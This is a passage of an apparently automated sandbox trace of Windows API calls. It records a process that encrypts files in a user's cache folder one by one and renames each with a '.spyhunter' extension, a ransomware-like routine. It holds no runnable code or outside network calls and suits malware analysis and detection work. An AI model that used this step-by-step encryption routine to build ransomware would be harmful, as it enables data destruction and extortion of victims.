[0151.791] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ee1c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ee1c*=0x30, lpOverlapped=0x0) returned 1 [0151.791] CloseHandle (hObject=0xb0) returned 1 [0151.791] GetProcessHeap () returned 0x2c0000 [0151.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0151.791] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778.spyhunter") returned 162 [0151.791] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_74e943f7dab6d19e37e4854057155778"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_74e943f7dab6d19e37e4854057155778.spyhunter")) returned 1 [0151.792] GetProcessHeap () returned 0x2c0000 [0151.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0151.792] GetProcessHeap () returned 0x2c0000 [0151.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0151.792] GetProcessHeap () returned 0x2c0000 [0151.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2feacb0 | out: hHeap=0x2c0000) returned 1 [0151.792] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ee58 | out: pbBuffer=0x248ee58) returned 1 [0151.792] GetProcessHeap () returned 0x2c0000 [0151.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0151.792] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ee50*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ee50*=0x30) returned 1 [0151.792] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_5ea65844b9ef5670a9c002cbd85b10a4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0151.793] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4") returned 152 [0151.793] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", lpSrch=".txt") returned 0x0 [0151.793] GetProcessHeap () returned 0x2c0000 [0151.793] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0151.793] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ee14, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ee14*=0x182, lpOverlapped=0x0) returned 1 [0151.794] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffe7e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.795] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x182, lpNumberOfBytesWritten=0x248ee14, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ee14*=0x182, lpOverlapped=0x0) returned 1 [0151.795] GetProcessHeap () returned 0x2c0000 [0151.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0151.795] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.795] WriteFile (in: hFile=0xb0, lpBuffer=0x248ee54*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ee14, lpOverlapped=0x0 | out: lpBuffer=0x248ee54*, lpNumberOfBytesWritten=0x248ee14*=0x4, lpOverlapped=0x0) returned 1 [0151.795] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ee14, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ee14*=0x30, lpOverlapped=0x0) returned 1 [0151.795] CloseHandle (hObject=0xb0) returned 1 [0151.795] GetProcessHeap () returned 0x2c0000 [0151.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0151.795] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4.spyhunter") returned 162 [0151.795] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_5ea65844b9ef5670a9c002cbd85b10a4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_5ea65844b9ef5670a9c002cbd85b10a4.spyhunter")) returned 1 [0151.796] GetProcessHeap () returned 0x2c0000 [0151.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0151.796] GetProcessHeap () returned 0x2c0000 [0151.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0151.796] GetProcessHeap () returned 0x2c0000 [0151.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2feab28 | out: hHeap=0x2c0000) returned 1 [0151.796] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ee58 | out: pbBuffer=0x248ee58) returned 1 [0151.796] GetProcessHeap () returned 0x2c0000 [0151.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0151.796] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ee50*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ee50*=0x30) returned 1 [0151.796] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_581c904db5924e46a6c1a8637614a40e"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0151.797] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E") returned 152 [0151.797] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", lpSrch=".txt") returned 0x0 [0151.797] GetProcessHeap () returned 0x2c0000 [0151.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0151.797] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ee14, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ee14*=0x182, lpOverlapped=0x0) returned 1 [0151.798] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffe7e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.798] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x182, lpNumberOfBytesWritten=0x248ee14, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ee14*=0x182, lpOverlapped=0x0) returned 1 [0151.798] GetProcessHeap () returned 0x2c0000 [0151.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0151.818] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.818] WriteFile (in: hFile=0xb0, lpBuffer=0x248ee54*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ee14, lpOverlapped=0x0 | out: lpBuffer=0x248ee54*, lpNumberOfBytesWritten=0x248ee14*=0x4, lpOverlapped=0x0) returned 1 [0151.818] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ee14, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ee14*=0x30, lpOverlapped=0x0) returned 1 [0151.818] CloseHandle (hObject=0xb0) returned 1 [0151.818] GetProcessHeap () returned 0x2c0000 [0151.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0151.818] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E.spyhunter") returned 162 [0151.819] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_581c904db5924e46a6c1a8637614a40e"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_581c904db5924e46a6c1a8637614a40e.spyhunter")) returned 1 [0151.819] GetProcessHeap () returned 0x2c0000 [0151.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0151.819] GetProcessHeap () returned 0x2c0000 [0151.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0151.820] GetProcessHeap () returned 0x2c0000 [0151.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fea9a0 | out: hHeap=0x2c0000) returned 1 [0151.820] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ee50 | out: pbBuffer=0x248ee50) returned 1 [0151.820] GetProcessHeap () returned 0x2c0000 [0151.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0151.820] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ee48*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ee48*=0x30) returned 1 [0151.820] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_50167909fcfe0c66153f1901439cbba1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0151.821] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1") returned 152 [0151.821] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", lpSrch=".txt") returned 0x0 [0151.821] GetProcessHeap () returned 0x2c0000 [0151.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0151.821] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ee0c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ee0c*=0x186, lpOverlapped=0x0) returned 1 [0151.822] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffe7a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.822] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x186, lpNumberOfBytesWritten=0x248ee0c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ee0c*=0x186, lpOverlapped=0x0) returned 1 [0151.822] GetProcessHeap () returned 0x2c0000 [0151.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0151.822] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.822] WriteFile (in: hFile=0xb0, lpBuffer=0x248ee4c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ee0c, lpOverlapped=0x0 | out: lpBuffer=0x248ee4c*, lpNumberOfBytesWritten=0x248ee0c*=0x4, lpOverlapped=0x0) returned 1 [0151.825] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ee0c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ee0c*=0x30, lpOverlapped=0x0) returned 1 [0151.825] CloseHandle (hObject=0xb0) returned 1 [0151.825] GetProcessHeap () returned 0x2c0000 [0151.825] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0151.825] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1.spyhunter") returned 162 [0151.825] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_50167909fcfe0c66153f1901439cbba1"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_50167909fcfe0c66153f1901439cbba1.spyhunter")) returned 1 [0151.826] GetProcessHeap () returned 0x2c0000 [0151.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0151.826] GetProcessHeap () returned 0x2c0000 [0151.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0151.826] GetProcessHeap () returned 0x2c0000 [0151.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fea818 | out: hHeap=0x2c0000) returned 1 [0151.827] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ee50 | out: pbBuffer=0x248ee50) returned 1 [0151.827] GetProcessHeap () returned 0x2c0000 [0151.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0151.827] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ee48*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ee48*=0x30) returned 1 [0151.827] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_294110d6990ee392327f8a606d55bc1e"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0151.828] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E") returned 152 [0151.828] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", lpSrch=".txt") returned 0x0 [0151.828] GetProcessHeap () returned 0x2c0000 [0151.828] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0151.828] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ee0c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ee0c*=0x186, lpOverlapped=0x0) returned 1 [0151.829] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffe7a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.829] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x186, lpNumberOfBytesWritten=0x248ee0c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ee0c*=0x186, lpOverlapped=0x0) returned 1 [0151.829] GetProcessHeap () returned 0x2c0000 [0151.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0151.829] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.829] WriteFile (in: hFile=0xb0, lpBuffer=0x248ee4c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ee0c, lpOverlapped=0x0 | out: lpBuffer=0x248ee4c*, lpNumberOfBytesWritten=0x248ee0c*=0x4, lpOverlapped=0x0) returned 1 [0151.829] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ee0c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ee0c*=0x30, lpOverlapped=0x0) returned 1 [0151.830] CloseHandle (hObject=0xb0) returned 1 [0151.830] GetProcessHeap () returned 0x2c0000 [0151.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0151.830] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E.spyhunter") returned 162 [0151.830] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_294110d6990ee392327f8a606d55bc1e"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_294110d6990ee392327f8a606d55bc1e.spyhunter")) returned 1 [0151.830] GetProcessHeap () returned 0x2c0000 [0151.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0151.830] GetProcessHeap () returned 0x2c0000 [0151.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0151.831] GetProcessHeap () returned 0x2c0000 [0151.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fea690 | out: hHeap=0x2c0000) returned 1 [0151.831] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ee48 | out: pbBuffer=0x248ee48) returned 1 [0151.831] GetProcessHeap () returned 0x2c0000 [0151.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0151.831] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ee40*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ee40*=0x30) returned 1 [0151.831] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_234cb5d64705d4dbb4da839716359af0"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0151.832] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0") returned 152 [0151.832] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", lpSrch=".txt") returned 0x0 [0151.832] GetProcessHeap () returned 0x2c0000 [0151.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0151.832] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ee04, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ee04*=0x182, lpOverlapped=0x0) returned 1 [0151.833] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffe7e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.833] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x182, lpNumberOfBytesWritten=0x248ee04, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ee04*=0x182, lpOverlapped=0x0) returned 1 [0151.833] GetProcessHeap () returned 0x2c0000 [0151.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0151.833] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.833] WriteFile (in: hFile=0xb0, lpBuffer=0x248ee44*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ee04, lpOverlapped=0x0 | out: lpBuffer=0x248ee44*, lpNumberOfBytesWritten=0x248ee04*=0x4, lpOverlapped=0x0) returned 1 [0151.833] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ee04, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ee04*=0x30, lpOverlapped=0x0) returned 1 [0151.833] CloseHandle (hObject=0xb0) returned 1 [0151.833] GetProcessHeap () returned 0x2c0000 [0151.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0151.833] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0.spyhunter") returned 162 [0151.834] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0" (normalized: 